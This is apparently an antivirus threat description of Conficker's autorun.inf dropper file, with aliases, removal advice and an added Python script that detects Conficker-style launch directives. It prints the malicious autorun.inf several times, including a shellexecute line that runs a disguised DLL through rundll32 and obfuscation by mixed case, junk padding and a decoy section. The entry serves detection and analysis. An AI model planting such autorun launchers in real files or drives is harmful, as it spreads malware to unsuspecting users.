W32/Conficker.worm!inf

Threat Detail

  • Malware Type: Virus
  • Malware Sub-type: Worm
  • Protection Added: 2009-01-07
This is a generic detection for a configuration text file (autorun.inf) used by W32/Conficker.worm. The file is usually dropped onto the root of all removable drives and mapped drives in an attempt to auto-run an executable when the drive is accessed.
Minimum Engine

5400.1158

File Length

Varies

Description Added

2009-01-07

Description Modified

2009-01-07

Malware Proliferation

(severity legend graphic omitted)


--------------------Updated on 4th Dec 2013------------------------------------

Aliases

  • Kaspersky    -    Worm.Win32.AutoRun.gxk
  • Microsoft    -    Worm:Win32/Conficker.B!inf

Characteristics

"W32/Conficker.worm!inf" is a detection for a configuration text file (autorun.inf) used by many worms.

This file is usually dropped onto the root of all removable drives and mapped drives in an attempt to auto-run an executable when the drive is accessed.


The size of this file varies with the length of the filename referenced inside the .inf file.

Some copies of this file have the System (S) and Hidden (H) attributes set, in an attempt to hide the file from the default viewing options of Windows Explorer.


The autorun.inf is configured to launch the worm's DLL via the following directives. Directive names are written in mixed case and interleaved with comment lines (beginning with ";") filled with random bytes; Windows parses autorun.inf as an INI file, so neither the case nor the padding affects the launch:

    [AUTorUN]
    ; ....Garbage....
    AcTION = Open folder to view files
    icon = %syStEmrOot%\sySTEM32\sHELL32.Dll ,4
    ; ....Garbage....
    shelLExECUte = RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
    ; ....Garbage....
    useAuTopLAY = 1

When AutoRun is triggered, the autorun.inf launches the payload from the following location:

    shelLExECUte = RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn [Detected as W32/Conficker.worm.gen.b]

The launched file is a worm that spreads by copying itself to removable drives and to the root of connected drives. It also spreads across the network by exploiting a vulnerability in the Windows Server service (Microsoft Security Bulletin MS08-067); successful exploitation allows remote code execution when file sharing is enabled.

------------------------Updated on 8 Nov 2013-------------------------------------------
Aliases

  • Microsoft    -    Worm:Win32/Conficker.B!inf
  • Symantec    -    W32.Downadup!autorun
  • Sunbelt    -    Worm.Win32.Conficker.B!inf
  • Trend        -    TROJ_DOWNAD.AD

"W32/Conficker.worm!inf" is a detection for a configuration text file (autorun.inf) used by many worms.

This file is usually dropped onto the root of all removable drives and mapped drives in an attempt to auto-run an executable when the drive is accessed.

The size of this file varies with the length of the filename referenced inside the .inf file.

Some copies of this file have the System (S) and Hidden (H) attributes set, in an attempt to hide the file from the default viewing options of Windows Explorer.

The autorun.inf is configured to launch the worm's DLL via the following directives. The genuine [AUTorUN] section is followed by a decoy section of random key=value pairs, and comment lines filled with random bytes are interleaved throughout:

    [AUTorUN]
    AcTION = Open folder to view files
    icon = %syStEmrOot%\sySTEM32\sHELL32.Dll ,4
    ; ....Garbage....
    shelLExECUte = RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn
    ; ....Garbage....
    useAuTopLAY = 1
    ; ....Garbage....

    [oiw]
    ; ....Garbage....
    blGkNaAOAStfJarztHQsDTE = X
    ; ....Garbage....
    ljjpceByfnCqlEdvFuiQtTXOX = DsuZYNfdNfgLkgdubp
    ; ....Garbage....
    AHBpQMGeNELqWqgVFUI = thvu
    t = en
    ZpmLWwdy = p
    ; ....Garbage....
    JirRwHUIcdygM = Dw
    yAPlzwzDWOQuOkdjb = fTwwFgsQkIuovohIAEhoMk
    ; ....Garbage....
    Df = EEKpaGzdkYcdqw
    ; ....Garbage....
    tYtGgOcpNmnREFeVOVYcmXi = BMlhoTHAdQ
    wu = jgQDsI
   
           
When AutoRun is triggered, the autorun.inf launches the payload from the following location:

  • shelLExECUte = RuNdLl32.EXE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn [Detected as W32/Conficker.worm]

The launched file is a worm that spreads by copying itself to removable drives and to the root of connected drives. It also spreads across the network by exploiting a vulnerability in the Windows Server service (Microsoft Security Bulletin MS08-067); successful exploitation allows remote code execution when file sharing is enabled.


-----------------------------------------------------------------------------------------------------

This is a generic detection for a configuration text file (autorun.inf) used by W32/Conficker.worm. The file is usually dropped onto the root of all removable drives and mapped drives in an attempt to auto-run an executable when the drive is accessed.

The size of this file varies.

Some copies of this file have the System (S) and Hidden (H) attributes set, in an attempt to hide the file from the default viewing options of Windows Explorer.

The contents of the file are similar to the following:

....Garbage....

shelLExECUte=RuNdLl32.EXE .\RECYCLER\S-x-x-xx-2819952290-8240758988-879315005-xxxx\jwgkvsq.vmx,ahaezedrn

....Garbage....

When AutoRun is triggered, the referenced file is executed and infection occurs. Because this infection is initiated locally, the worm does not need to exploit MS08-067 for this vector, so having applied that patch alone will not stop the infection.
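The obfuscated autorun.inf samples in the entries above (and the excerpt just shown) all reduce to the same shellexecute directive once the case tricks, comment padding and decoy section are stripped. The following Python script is an added example, not McAfee's detection logic and not code from the worm: it parses an autorun.inf the tolerant way a triage tool must (raw bytes, case-insensitive names, lines beginning with ";" skipped, unparseable lines ignored) and flags the Conficker-style launch pattern. The sample file bytes are constructed for the example, modelled on the samples above; the indicator names and the benign comparison file are the example's own choices.

```python
"""Tolerant autorun.inf parser with a Conficker-style launch check.

Added example; not part of the original McAfee description and not the
worm's own code. Windows reads autorun.inf as an INI file: directive
names are case-insensitive, lines beginning with ';' are comments, and
other unparseable lines are ignored, which is why the worm can pad the
file with random bytes without breaking the shellexecute directive.
"""
import re

# Constructed sample modelled on the samples in the description: mixed-case
# directive names, comment and stray lines filled with junk bytes, and a
# decoy [oiw] section of random key=value pairs.
SAMPLE_AUTORUN = (
    b"[   AUTorUN  \n"
    b" ;  \xa3\x9a\x01junk\xff\xfe\n"
    b"\x8c\xd2stray line without a semicolon\x04\n"
    b"   AcTION = Open folder to view files\n"
    b"   icon = %syStEmrOot%\\sySTEM32\\sHELL32.Dll ,4\n"
    b";\xc3\xbf\x01\x02 more junk\n"
    b"shelLExECUte =RuNdLl32.EXE .\\RECYCLER\\S-5-3-42-2819952290-8240758988-879315005-3665\\jwgkvsq.vmx,ahaezedrn\n"
    b"   useAuTopLAY = 1\n"
    b"[oiw]\n"
    b"blGkNaAOAStfJarztHQsDTE = X\n"
)

# Constructed benign autorun.inf of the kind shipped on vendor CDs, for comparison.
BENIGN_AUTORUN = b"[autorun]\r\nopen=setup.exe\r\nicon=setup.exe,0\r\nlabel=Vendor Tools\r\n"

SECTION_RE = re.compile(r"^\s*\[\s*([^\]\r\n]*?)\s*\]?\s*$")      # ']' may be missing
KEY_RE = re.compile(r"^\s*([^=;\[][^=]*?)\s*=\s*(.*?)\s*$")
LAUNCH_KEYS = ("shellexecute", "open")
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(?P<path>[^\s,]+)(?:,(?P<export>\S+))?", re.I)
RECYCLER_RE = re.compile(r"RECYCLER\\S-\d+(?:-\d+)+\\", re.I)


def parse_autorun(data: bytes) -> dict:
    """Parse raw autorun.inf bytes into {section: {key: value}}, names lower-cased.

    Decodes as latin-1 so junk bytes never raise an error.
    """
    sections: dict = {}
    current = None
    for raw in data.splitlines():
        line = raw.decode("latin-1")
        if not line.strip() or line.strip().startswith(";"):
            continue                                  # blank or comment line
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            sections[current][m.group(1).lower()] = m.group(2)
        # anything else is junk that Windows ignores as well
    return sections


def triage(data: bytes) -> dict:
    """Extract the launch directive and list Conficker-style indicators."""
    sections = parse_autorun(data)
    autorun = sections.get("autorun", {})
    command = next((autorun[k] for k in LAUNCH_KEYS if k in autorun), "")
    result = {"command": command, "path": "", "export": "", "indicators": []}
    m = RUNDLL_RE.search(command)
    if m:
        result["path"] = m.group("path")
        result["export"] = m.group("export") or ""
        result["indicators"].append("rundll32 used as launcher")
        if RECYCLER_RE.search(result["path"]):
            result["indicators"].append("payload under a RECYCLER\\S-... directory")
        if not result["path"].lower().endswith(".dll"):
            result["indicators"].append("DLL loaded under a non-.dll extension")
    if autorun.get("useautoplay", "").strip() == "1":
        result["indicators"].append("useautoplay=1")
    junk = sum(1 for b in data if b >= 0x80 or (b < 0x20 and b not in b"\t\r\n"))
    if junk:
        result["indicators"].append(f"{junk} non-text bytes (padding)")
    decoys = [s for s in sections if s != "autorun"]
    if decoys:
        result["indicators"].append("decoy sections: " + ", ".join(decoys))
    return result


def is_conficker_style(data: bytes) -> bool:
    """True when rundll32 loads a payload from a RECYCLER\\S-... path."""
    ind = triage(data)["indicators"]
    return "rundll32 used as launcher" in ind and any(
        i.startswith("payload under a RECYCLER") for i in ind)


if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        r = triage(blob)
        print(name, "->", r["command"] or "(no launch directive)")
        for i in r["indicators"]:
            print("   -", i)
```

Run it over the autorun.inf collected from the root of a suspect drive; the parser deliberately does not normalise the file before matching, because the padding and the decoy section are themselves useful indicators, and the benign vendor file shows that a plain open= directive on its own produces none.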

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files for the purpose of hooking system startup will be removed successfully when cleaning with the recommended engine and DAT combination (or higher).

Infection starts either with manual execution of the binary or by navigating to a drive or folder containing an autorun.inf, which can cause auto-execution of the worm.
A sign of infection is the presence of autorun.inf files on the root of removable drives or mapped network drives containing information similar to that described in the "Characteristics" section.